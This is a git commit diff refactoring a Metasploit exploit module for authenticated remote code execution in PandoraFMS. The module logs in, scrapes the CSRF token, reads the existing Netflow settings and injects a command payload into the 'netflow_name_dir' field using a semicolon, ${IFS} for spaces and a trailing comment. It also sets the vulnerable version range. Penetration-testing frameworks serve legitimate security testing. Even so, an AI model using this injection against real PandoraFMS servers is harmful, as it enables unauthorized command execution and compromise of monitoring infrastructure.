Addressing comments

msutovsky-r7 · msutovsky-r7 · commit 195b87419079 · 2025-07-04T08:54:30.000+02:00
diff --git a/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb b/modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb
@@ -16,7 +16,7 @@ def initialize(info = {})
         info,
         'Name' => 'PandoraFMS Netflow Authenticated Remote Code Execution',
         'Description' => %q{
-          This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires a set of user credentials to modify Netflow settings. Also, Netflow binaries have to present on the system.
+          This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires a set of user credentials to modify Netflow settings. Also, Netflow binaries have to be present on the system.
         },
         'License' => MSF_LICENSE,
         'Author' => ['msutovsky-r7'], # researcher, module dev
@@ -77,15 +77,15 @@ def check
 
     @csrf_token = html.at('input[@id="hidden-csrf_code"]')&.attributes&.fetch('value', nil)
 
-    return Msf::Exploit::CheckCode::Safe('Application is not probably PandoraFMS') unless version
+    return Msf::Exploit::CheckCode::Safe('Application is not probably PandoraFMS') if version.blank?
 
     version = version[1..]&.sub('NG', '')
 
     vprint_warning('Token was not parsed, will try again') unless @csrf_token
 
     vprint_status("Version #{version} detected")
 
-    return Exploit::CheckCode::Vulnerable("Vulnerable PandoraFMS version #{version} detected") if Rex::Version.new(version).between?(Rex::Version.new('7.0.774'), Rex::Version.new('7.0.777.10'))
+    return Exploit::CheckCode::Appears("Vulnerable PandoraFMS version #{version} detected") if Rex::Version.new(version).between?(Rex::Version.new('7.0.774'), Rex::Version.new('7.0.777.10'))
 
     Msf::Exploit::CheckCode::Safe("Running version #{version}, which is not vulnerable")
   end
@@ -108,6 +108,13 @@ def get_csrf_token
     fail_with Failure::NotFound, 'Could not found CSRF token' unless @csrf_token
   end
 
+  ##
+  # Checks whether login response was valid and successful. It check whether response code is 200 an if body contains either of following values - id="welcome-icon-header", id="welcome-panel" or "godmode"
+  ##
+  def login_successful?(res)
+    res&.code == 200 && res.body.include?('id="welcome-icon-header"') || res.body.include?('id="welcome_panel"') || res.body.include?('godmode')
+  end
+
   def login
     res = send_request_cgi!({
       'method' => 'POST',
@@ -122,7 +129,13 @@ def login
         'csrf_code' => @csrf_token
       }
     })
-    fail_with Failure::NoAccess, 'Invalid credentials' unless res&.code == 200 && res.body.include?('id="welcome-icon-header"') || res.body.include?('id="welcome_panel"') || res.body.include?('godmode')
+    fail_with Failure::NoAccess, 'Invalid credentials' unless login_successful?(res)
+  end
+
+  def valid_netflow_options?(opts)
+    opts.each do |item|
+      return false if item.blank?
+    end
   end
 
   def configure_netflow
@@ -140,30 +153,34 @@ def configure_netflow
 
     netflow_daemon_value = html.at('input[@name="netflow_daemon"]')&.attributes&.fetch('value', nil)
     netflow_nfdump_value = html.at('input[@name="netflow_nfdump"]')&.attributes&.fetch('value', nil)
-    netflow_nfexpire_value = html.at('input[@name="netflow_nfexpire"]')&.attributes&.fetch('value', nil)
+    html.at('input[@name="netflow_nfexpire"]')&.attributes&.fetch('value', nil)
     netflow_max_resolution_value = html.at('input[@name="netflow_max_resolution"]')&.attributes&.fetch('value', nil)
     netflow_disable_custom_lvfilters_sent_value = html.at('input[@name="netflow_disable_custom_lvfilters_sent"]')&.attributes&.fetch('value', nil)
     netflow_max_lifetime_value = html.at('input[@name="netflow_max_lifetime"]')&.attributes&.fetch('value', nil)
     netflow_interval_value = html.at('select[@name="netflow_interval"]//option[@selected="selected"]')&.attributes&.fetch('value', nil)
 
-    fail_with Failure::Unknown, 'Failed to get existing Netflow configuration' unless netflow_daemon_value && netflow_nfdump_value && netflow_nfexpire_value && netflow_max_resolution_value && netflow_disable_custom_lvfilters_sent_value && netflow_max_lifetime_value && netflow_interval_value
+    request_data = {
+      'netflow_daemon' => netflow_daemon_value,
+      'netflow_nfdump' => netflow_nfdump_value,
+      'netflow_max_resolution' => netflow_max_resolution_value,
+      'netflow_disable_custom_lvfilters_sent' => netflow_disable_custom_lvfilters_sent_value,
+      'netflow_max_lifetime' => netflow_max_lifetime_value,
+      'netflow_interval' => netflow_interval_value
+    }
+
+    fail_with Failure::Unknown, 'Failed to get existing Netflow configuration' unless valid_netflow_options?(request_data)
+
+    request_data.merge!({
+      'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + '#',
+      'update_config' => '1',
+      'upd_button' => 'Update'
+    })
 
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'vars_get' => { 'sec' => 'general', 'sec2' => 'godmode/setup/setup', 'section' => 'net' },
-      'vars_post' =>
-      {
-        'netflow_name_dir' => ';' + payload.encoded.gsub(' ', '${IFS}') + '#',
-        'netflow_daemon' => netflow_daemon_value,
-        'netflow_nfdump' => netflow_nfdump_value,
-        'netflow_max_resolution' => netflow_max_resolution_value,
-        'netflow_disable_custom_lvfilters_sent' => netflow_disable_custom_lvfilters_sent_value,
-        'netflow_max_lifetime' => netflow_max_lifetime_value,
-        'netflow_interval' => netflow_interval_value,
-        'update_config' => '1',
-        'upd_button' => 'Update'
-      }
+      'vars_post' => request_data
     })
     fail_with Failure::PayloadFailed, 'Failed to configure Netflow' unless res&.code == 200
   end
